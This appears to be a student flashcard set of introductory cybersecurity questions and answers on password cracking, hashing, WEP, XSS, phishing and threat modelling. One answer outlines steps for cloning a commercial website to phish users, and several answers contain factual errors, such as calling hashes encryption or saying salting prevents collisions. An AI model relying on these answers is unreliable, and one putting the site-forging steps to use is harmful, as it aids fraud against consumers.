Cybersecurity
Describe three different cracking methods, such as 'brute force', 'dictionary attacks', and rainbow tables'
Brute Force: This is the easiest form of attack method, however is the most inefficient way to check passwords, it iterates through every possible character until it finds the password that matches. Dictionary Attack: This form of attack takes in a "dictionary" of top most common passwords, and runs and algorithm to compare all these different passwords, to the one entered in the input field. Dictionary's can also inform a user when their password is weak moderate, or strong, since people in general make bad passwords, a dictionary of phrases can be used to compare these bad passwords to the common phrases Rainbow table: This is a table of most commonly used passwords, along with their values after encryption. so example a password of test, the md5 encryption, the sha1 encryption etc. This type of attack is not always viable, since most attackers don't know which algorithm may have been used, or if multiple were used.
Provide a description of buffer overflows and identify how the occur, and how they can be exploited by an attacker.
Buffer Overflows occur when a specific input is expecting a certain amount of data, and is instead provided with an amount of data in excess of the expected amount, much more then the program can handle. When the data is collected and sent to memory, it exceeds the alloted space, writing beyond the address range it was given. When used as an exploit, the attacker could inject executable code in the memory, so that the system will run the code they entered, typically causing unexpected operation. Alternatively, they could enter erroneous data into neighboring memory addresses, possibly corrupting the system.
What makes WEP a poor protocol choice?
1. The encryption key is too short and susceptible to dictionary attacks. 2. It uses a static key shared between two devices. Due to the inconvenience of changing the key in two places, the same key tends to be used for a long time. 3. The encryption is easy to brute force. 4. The integrity check is not robust, so the data is easy to modify without the end user knowing. 5. There is no authentication. A device need only present a valid Mac address and SSID to be on the network.
Describe the difference between functional testing and security testing.
Functional testing is typically done before release, and verifies that given normal expected inputs that the program will operate as expected, and that with unexpected inputs the program will either function and handle the input, or fail gracefully. Security testing can occur either late in the development cycle or, less ideally, post release. The purpose of Security testing is to actively attack and attempt to find and exploit vulnerabilities in the program.
Suggest a source of some very long unpredictable numbers. Your source must be something that both the sender and receiver can readily access but that is not obvious to outsiders and not transmitted directly from sender to receiver.
Geographic location timestamp seed concatenate several number strings
What is meant by a 'one way hash function'? Describe how they are used.
One way hash functions are a method of encryption that are used to check the integrity and authentication of packets of data. Essentially, they will convert a string of any size to a fixed binary sequence. They are easy to solve for a single direction, however, require an immense work factor to decipher. In example, from the textbook, an equation like y = x^3 is easy to solve for y given x, however, the reverse is much more difficult to calculate.
Describe the SSL protocol
SSL or secure socket layer is a cryptographic protocol used to securely connect two machines over the internet, encrypting information that would normally be sent as plain text. It is most commonly used when interacting with a server through a web browser, when you see HTTPS at the beginning of the URL of a page, it means the server is utilizing the SSL protocol, the S in HTTPS stands for secure.
What is a database management system? What functions does it perform? Provide examples of two different DBMS solutions (vendor and typical uses).
A Database management system is a piece of software that allows users to access and modify the information stored in a database. DBMS can also perform monitoring and enforce access control. Two common DBMS are IBM's DB2 and the open source MySQL. DB2 would typically be used in large corporate environments, while MySQL is often used in the backend of web applications.
Which component of the CIA Triad is the DoS attack intended to defeat?
A DoS, or Denial of Service, attack prevents a user from accessing a specific service. This is a direct breach of Availability in the CIA triad as content and services that should be readily used by the user cannot be accessed. Attackers can overload a service with significant requests which would effectively render the specific piece of software inaccessible.
Describe what is meant by a 'Collision Condition' in the context of a hash function.
A collision occurs when a hashing algorithm produces two of the same outputs. Generally with hashing algorithms, when input is put through it, every output should be different. However, in some rare instances, this doesn't happen and output can be the same after hashed. When algorithms do this, it has a weakness that hackers could use to exploit. They could use this knowledge to decrypt data or recreate the hashing algorithm. Overall, this shouldn't happen. Collisions can be avoided by adding salt to every piece of data or revamping the hashing algorithm itself to avoid the kind of weakness.
Distinguish between vulnerability, threat, and control.
A vulnerability is any weakness in a system that could be manipulated, which could cause unwanted effects. Not having proper user identification procedures, such as security questions and strong passwords could lead to a vulnerability. A threat is anything that could potentially cause harm to a system, as a result of a vulnerability. Threats can be started by humans or computers themselves. A threat can even be a natural disaster that would wreak havoc on a system. Controls help prevent vulnerabilities so threats are less likely to occur. Controls can be techniques or a device (fingerprint scanner) used to reduce vulnerabilities.
List three authentication questions (but not the answers) a credit card company could ask to authenticate a customer over the phone. The questions should be ones to which an impostor could not readily obtain the answers. How difficult would it be for you to provide the correct answer (for example, you would have to look something up or you would have to do a quick arithmetical calculation)?
A. Last two valid transactions in your credit card. In this case, the owner of the card can have these information ones they login to online banking or they remember from memory. B. ZIP CODE of the billing address Its usually hard to tell which area the card is coming from. This is a personal information that the owner of the card will have since there are so many zips to choose from. C. Credit Limit of the card Everyone has a credit card limit and this is also personal information. Only the user will know the answers to these questions.
Discuss a situation in which the sensitivity of an aggregate is greater than that of its constituent values. What about a situation in which the sensitivity of an aggregate is less than that of its constituent values?
Aggregate is of greater sensitivity than constituent values: Purchase history. A single credit card transaction doesn't offer that much information, but if a billing statement, or collection of billing statements can be viewed, all kinds of information and inferences could be made about the person and their habits. Constituents are of greater sensitivity than aggregate: A good example of this is a survey. In many surveys individuals inputs are anonymized and protected from the surveyor, this is because they want respondents to reveal how they really feel so that the surveyor can gain an overall sense of a situation or sentiment. The results of a survey are normally published and made to view but the individual answers are not revealed to protect those who responded.
File access control relates largely to the secrecy dimension of security. What is the relationship between an access control matrix and the integrity of the objects to which access is being controlled?
An access control matrix is a security model in which every user in the system has a certain access level to every object in the system. This system allows data to only be accessed by users in the system that are authorized to access the data. As far as the integrity of objects to which the access is being controlled, the integrity in enforced by only allowing access as intended by the administrator of the system. Through the matrix, only objects that the users of the system have the level of authority to access may be accessed by any given user.
Explain how a forger can create an authentic-looking website for a commercial establishment.
An attacker can forge a website by going to the legitimate website, using the inspect command are get the HTML/CSS code. After getting that code, you can work backwards to get similar PHP, which is not as important because user's see HTML and CSS more. 1. Register a somewhat authentic looking domain name. 2. Copy the source code of the page you're trying to mimic. 3. Copy the CSS of the page you are trying to mimic.
What makes a network vulnerable to interception?
Anonymity : Being anonymous allows the attacker many attempts from anywhere in the world which would support brute force style attacks. Many points of attack: Larger networks allow for many more points of entry. The same way that more complex cars have more potential problems than simpler cars. Complex networks: Again, complexity makes a system harder to protect especially networked systems. Unknown perimeter and path: This goes along with complexity. The constant changing of a network makes for lots of systems being confused with one another making it hard to detect and keep track of what belongs and what doesn't.
What is Phishing?
COLLAPSE Phishing is a social engineering method that attempts to trick a user into thinking that a fake web page or some sort of interface that handles and accepts sensitive user information (username, password, credit card numbers, etc) is actually the real one. This can be very dangerous as if the user is not wary and tricked by the false page, they could potential have their account stolen, or even their identity or banking information. In order to prevent against these kinds of attacks, it is important to always check the URL of a web page that you arrive to in order to insure that it is in-fact the actual website, and not a clone that is attempting to phish.
Define and describe confidentiality, integrity, and availability of data.
Confidentiality is the aptitude of a system to guarantee that an asset is viewed only by authorized parties. If something is confidential, only authorized people or systems can gain access to the protected data. The term "confidentiality" is often used in relation to data. Examples of breaches in confidentiality are an unauthorized person accesses a data item, a person authorized to access certain data accesses other data not authorized, or an unauthorized person learns the existence of a piece of data. One word that captures most aspects of confidentiality is view: look but do not touch. In computer security, confidentiality typically means finding but not altering. Integrity is the facility of a system to confirm that an asset is changed only by authorized parties. Integrity is harder to pin down than confidentiality, because integrity means different things in different situations. In general, if something has integrity then it is precise, accurate, modified only in acceptable ways and by only authorized people in an authorized process, consistent, meaningful, and usable. Availability is the capacity of a system to certify that an asset can be used by any authorized parties. Availability applies both to data and to services, and it can be rather complex at times. In general, an object is available if it is present in a usable form, it has enough capacity to meet the service's needs, it is making clear progress and it has a bounded waiting time.
Discuss each of the principles of the CIA triad as they relate to database systems.
Confidentiality: Confidentiality is important when concerning data systems because the data being held in the system can vary in the level of importance. If there is highly sensitive information contained in the system, then it is important for that information to be treated as such with the proper security measures. Integrity: Integrity is imperative when talking about data systems because of the need for the data being stored there to actually be what is described. If the data being stored in the system is not what is being said is being stored there, then the data cannot be ensured to be credible. Availability: Availability is important when it comes to data systems. Because the development of the system needs to be a shared effort between individuals creating it, it is important for the information to be accessible to the people developing it. However, it is important that only the appropriate people are able to access and edit the system and the data contained.
Describe Cross-Site Scripting (XSS). What is it and how is it carried out?
Cross-Site-Scripting is a type of attack where malicious code is executed during the interaction between the client and server. A scripting attack essentially causes the server to allow extra code to execute additional commands, called a script, in an ordinary fetch request.
List at least three kinds of damage a company could suffer when the integrity of a program or company data is compromised.
Data Loss - A hacker leaks the social security numbers and private information of people staying at a five star hotel. The hotel is insured as well as the people, however a guest of the hotel sues due to psychological damages of identity theft. Reputation - An AntiVirus company is attacked by malware that avoids detection. When the company sends out an update, the malware is installed in each users computer and records the users keystrokes. People no longer trust the AntiVirus company even though a quick patch is created and no damage is done. Internal Damage - A sales company hires a new IT intern. The intern somehow changes the format of the website that it goes down for 24 hours. No member of the company can work, and the company loses a full day of revenue. The intern is shortly fired. Financial: When a program's integrity or data is compromised, there is always the potential for financial loss. The company's online marketplace or website could be shut down, causing a loss of business and money.
How is data transmitted over a network?
Data is transmitted in packets of information which contain the destination address, the source address, and the unit of information being sent. All of the packets together comprise the entirety of the information that is being moved from one network to another. Devices will send these packets of information to the router, which calculates using a table to most efficient route for the given packet to be sent. Packets originating from the same unit of information do not necessarily take the same route from network to network. Once the piece of information has arrived they are reassembled on the recipient network.
Does password length play a role in increasing the strength of the password?
In general, yes. The longer the password is, the longer it will take for malicious users to decipher the password. But, the strength of the password not only relies on length, but also its complexity and unpredictability. Including special characters, numbers, and a mixture of uppercase and lowercase letters, for unpredictable phrases, makes for a strong password.
List at least three kinds of harm a company could encounter from loss of service, that is, failure of availability. List the product or capability to which access is lost, and explain how this loss hurts the company.
Loss of Potential Customers: If your website is not available for an extended period of time, customers looking for your service will click on your link, see that it is a dead link, and then move on to one of your competitors for the service. This also may affect some of your current customers with the service not being available to them for an extended period of time which may force them to choose a service that is available. This negatively affects the company because it pushes away customers which makes the company lose revenue. Productivity Loss: If the company's servers are down and the employee's cannot access the files and data they need, nothing will get done at this company until the problem is resolved. Discovery: When a company is suffering from failure of availability, new customers trying to access the company via the internet may believe that the company no longer exists or is closed down. If the failure of availability if affecting the company's servers that provide their advertising, the company may lose out on potential customers who may have an interest in the company's product. Dependability: If a company has issues with frequent loss of service, customers' faith with the company may begin to dwindle overtime. If customers are unable to access the company's services, they may begin to take their interests elsewhere, resulting in a lost customer for the company, and therefore, a loss in sales.
If you forget your password for a website and you click [Forgot my password], sometimes the company sends you a new password by email but sometimes it sends you your old password by email. Compare these two cases in terms of vulnerability of the website owner.
Neither solution is great. Both result in an active password being sent over email, which means its probably unencrypted. Simply send the old password is definitely worse, especially if setting a new one isn't required, because then the user may just stick with that password even though it has been transmitted insecurely. The other option is the better of the two especially if the new password is only temporary and must be replaced after one use. However, both of these solutions rely on email, which due to its popularity and how often people sign into it, tend to have weak passwords
Select and describe two browser attack types
Page-in-the-Middle: - This type of browser attack redirects the user to another page. An attacker could wait until the user goes into a particular part of the page ie.login and capture the user's credentials. Keystroke Logger: - A keystroke logger can be either software or hardware. The logger either retains the keystrokes made or sends the to an attacker across a network. The hardware version could be plugged into a USB port and used to compromise the computer by download and later on retrieving it. Cross site scripting Cross site scripting attacks or XSS are a fairly common vulnerability. This is caused by not having proper form sanitation where javascript can be executed by writing it in a form and then submitting it. This can also happen sometimes by simply writing the javascript in the url. SQL Injection A SQL injection also has to do with forms not sanitizing their input, One can enter their SQL command and trick the form that is doing the query to execute that command as well which means an attacker could drop the list of usernames from a login for example. Download Substitution: When a user goes to download a piece of software, the download button/link either downloads a malicious program or the legitimate program coupled with a malicious program. Unfortunately, many legitimate software downloading sites have fake download buttons and legitimate software is often bundle undesired or useless software in the download. This is often done to help fund the free software or hosting site.
Discuss the basic security requirements of database systems.
Physical database integrity - The hardware the databases are running on must be kept physically safe and protected from threats Logical database integrity - The structure of the database is preserved, a change affect only entities that they are supposed to. Element integrity - Elements contain accurate information. Auditability - Access can be tracked and changes monitored. Access Control - Users can access only parts of the database that they are authorized to access. User authentication - Users are who they say they are, verified for auditability and access control Availability - the database is up and running and accessible.
How is port scanning used by attackers?
Port scanning is a method of gathering intelligence on potential targets. Because time is often valuable, and weak attacks may result in detection, details about a system are valuable to attackers so they can focus their efforts. Port scanning is easy to carry out with many free port scanning utilities being available online. Port scanning can reveal 3 important types of information to an attacker; what ports and services are running, the installed operating system, and installed applications and their versions. Given this information, attackers can increase their chance of success.
What is public key cryptography? Explain how it works.
Public key cryptography is a type of encryption that relies on two mathematically related keys to encrypt and decrypt data. The public key is used to encrypt data and can be shared freely. The public key is usually very long and is often stored in a type of token that will grant you access. This is usually a piece of hardware like a USB token. The private key, which is only supposed to be known to the user can decrypt the data. Although the public key and private key are mathematically related, the private key cannot be calculated from the public key. The concept of two different keys heightens security because only someone possessing both keys has the power to freely encrypt and decrypt data.
Select a network hardware component and describe its function (such as router, switch, etc.)
Routers are the means of communication between networks, where packets of information are relayed across units to spread information. At each junction, or router, a table is used to calculate the most efficient route for the package to take towards it's destination. Routers are important devices for directing traffic on the Internet as well as allowing computers and other devices within its vicinity to connect and share information with the Internet. Cable Modem: The function of the cable modem is to have your computer be able to communicate with your ISP (Internet Service Provider) through a landline connection. It also converts analog signal to a digital signal which then grants access to broadband Internet. Then, by connecting your computer directly to the cable modem through the use of an ethernet cable you can have this wired connection. Alternatively, a wireless router can be connected to the cable modem through an ethernet cable to create a wireless connection. This is one of the core components necessary to have a functional network and have it be usable. Network Switches. Switches used to sit in between routers and hubs in terms of functionality, but now that hubs effectively don't exist anymore, switches have filled in what hubs used to be used for. Switches do a better, more efficient job anyway. Switches create networks, but typically only in a local sense. Switches can be managed or unmanaged, and handle intra-network communication using a MAC table to route packets between computers. In a home scenario, the small switch (typically 4 port) is bundled in one piece of hardware with the router, access point, and maybe even modem.
What is meant by 'salting' in the context of hash functions?
Salting is a cybersecurity method for protecting passwords through the back-end addition of a 'salt' or string to the front-end entered password. This allows for additional security in hash functions because programmers can add a secret value to passwords such that attackers have a harder time guessing hash values. By attaching the salt to a password, the output hash is far different than the hash of just the users password. Further, by creating unique salt values for each user, the attacker would have a very difficult time using various cracking methods relying on password word banks.
Defeating authentication follows the method-opportunity-motive paradigm described in Chapter 1. Discuss how these three factors apply to an attack on authentication.
Someone wanting to defeat an authentication would need a method for breaking in, a vulnerability or opportunity from the system and a reason for wanting to get in. Methods will change with what type of authentication it uses. The more sophisticated the authentication, the more skill it will take to break. Opportunities in systems could be an employee with a particularly weak password, or an employee leaving their computer unlocked while they are away from their desk. Many seemingly small mistakes are more than enough opportunity for a hacker to get past an authentication. Motives will always vary, but most people would target systems where there is a lot to gain, like lots of money or enough information to steal someone's identity.
Briefly describe each layer in the OSI model
The Open Systems Interconnection model is a 7 layer system in which information can flow between networks. Physical (Layer 1): refers to the medium through which bit information is to be communicated. Data Link (Layer 2): produces electric or optical signals, from the desired information, into frames. Network (Layer 3): produces packets of frames with proper addressing for router based prorogation Transport (Layer 4): ensures that the delivery of the packeted information is accurate Session (Layer 5): provides the link of communication between two systems for information to be communicated Presentation (Layer 6): translates information received into a form for the recipient to use Application (Layer 7): produces the user end and interface through which the information can be utilized
Differentiate between symmetric and asymmetric encryption systems.
The differentiation between symmetric and asymmetric encryption systems is really quite simple, but can lead to very powerful cryptography. Symmetric encryption systems require a single encryption key in order to make use of an encryption algorithm such as a hash function. Asymmetric systems, on the other hand, require two keys. One of these keys can, in fact, even be public. This allows for the possibility of interactions such as financial transactions between two parties possibly unknown to each other, where one of the keys can be freely exchanged without compromising the private key and, consequently, the original system.
Identify and describe 3 different types of malware
Viruses - This type of malware spreads itself around a computer infecting and corrupting files as it goes. Worms - This type of malware tries to propagate across a network, afflicting other connected computers. Trojan Horses - This type of malware lies in wait until activated by a timer or specific action. likely looks like a harmless program Ransomware- Ransomware is a malware that infects users computers, typically through malicious links, that requires users to pay a fine to get access to their affected files Spyware- malware that runs in the background of users accounts to gather important information without the knowledge of the user. The user may send the data to others without permission. Script Attack - Malicious code (usually JS) that gets downloaded as part of a page load. Two examples of this are popups that become so tall they're impossible to close and new browser tabs that seem to spawn every time you go to close the existing tab.
Using the two-step commit presented in the beginning of this chapter, describe how to avoid assigning one seat to two people, as in the airline example. That is, list precisely which steps the database manager should follow in assigning passengers to seats.
When beginning the intent phase, the first step is to check the COMMIT-FLAG, if it is not set (it is not interpreted as true), then the DBMS Checks for the desired seats corresponding to each passenger. Matches TNAME1-SEAT to TNAME1, and TNAME2-SEAT to TNAME2. i.e., we assume for the sake of simplicity that TNAME1's seat field was set to the arbitrary value TNAME1-SEAT, and that the respective operation was performed for TNAME2. Checks to ensure the correct "seat" values for each passenger. Note that each variable beginning with T signifies that it is a temporary copy variable - properly known as shadow variable. Now, the DBMS initializes the commit phase and, Sets the value of COMMIT-FLAG. Sets NAME1's seat field to NAME1-SEAT, and performs the respective operation for NAME2. Prepares any additional information for the database managers. Unsets the COMMIT-FLAG. The database has now been updated securely. If at any step of the intent phase the operation failed, it would have been picked up, and the whole operation would be refreshed.
Consider a program to accept and tabulate votes in an election. Who might want to attack the program? What types of harm might they want to cause? What kinds of vulnerabilities might they exploit to cause harm?
Who might want to attack the program? -Foreign Governments -Terrorists and/or Terrorist -Organizations -Domestic Political Parties -Activists -Anarchists -Bored People What types of harm might they want to cause? -Sway an Election -Destabilize the foundation of a political system -Cause the country to lose global power and reputation -Cause an economic spiral or an economic melt down -Cause the people to revolt and protest -Citizen death due to rioting and civil unrest What kinds of vulnerabilities might they exploit to cause harm? -Take advantage of a weak background check and get hired as a programmer for the tabulation program -Hack into the voting system -Use open source data on the voting trends of districts to target key areas and destroy the physical copies of votes
Consider a program that allows consumers to order products from the web. Who might want to attack the program? What types of harm might they want to cause? What kinds of vulnerabilities might they exploit to cause harm?
Who might want to attack the program? -Thieves -Political Enemies -Romantic Enemies (alienated spouses or ex-lovers who have been given or have stolen account information) -Bored People What types of harm might they want to cause? -They might want to steal folks' identity -They could use accounts to order themselves a bunch of things -They could hold accounts hostage and ask for ransom What kinds of vulnerabilities might they exploit to cause harm? -They might call the webservice claiming to have forgotten their (your) password -They might use a bot to rapidly run through and test common passwords on your account -They might send you an email virus and obtain an excel spreadsheet of your passwords -They might gain control of your webcam and watch you type a password
You receive an email message that purports to come from your bank (Your Secure Bank). It asks you to click a link for some reasonable-sounding administrative purpose. How can you verify that the message did come from your bank?
You can start by looking at the email address it is sent from. An unexpected email or one that does not match the name of your bank are signs that it could a malicious email. Also verify that the email you are using is the one that is connected to your bank. Check over the contents of the email to make sure there are not any glaring errors like misspelled words or unprofessionally formatted text. You can also look at the link provided in the email. Hovering over a hyperlink will show the address of the site, so if it is not your bank's address, then don't click it. If there was any doubt, I would go right to my bank's website and confirm that whatever administrative task the email was asking me to do, actually needed to be done.
Considering the CIA triad, describe the role that cryptography plays.
in the CIA triad cryptography targets all three of the members. Confidentiality: Encrypting a message results in a third party not being able to view data they aren't allowed to view. Where the data is probably a bunch of random letters and numbers without the decryption key, so encrypting it makes the file or data essentially meaningless. Integrity: Once encrypted by md5 or md4 etc. a program writes out a specific code in hex. so even one bit of changed data will result in an entirely different hex code. Therefore, someone will know if their data has been tampered with if the hex code doesn't match the expected. Availability: Cryptography should be used so it doesn't affect the ability to access and retrieve data, for those users who need to access it.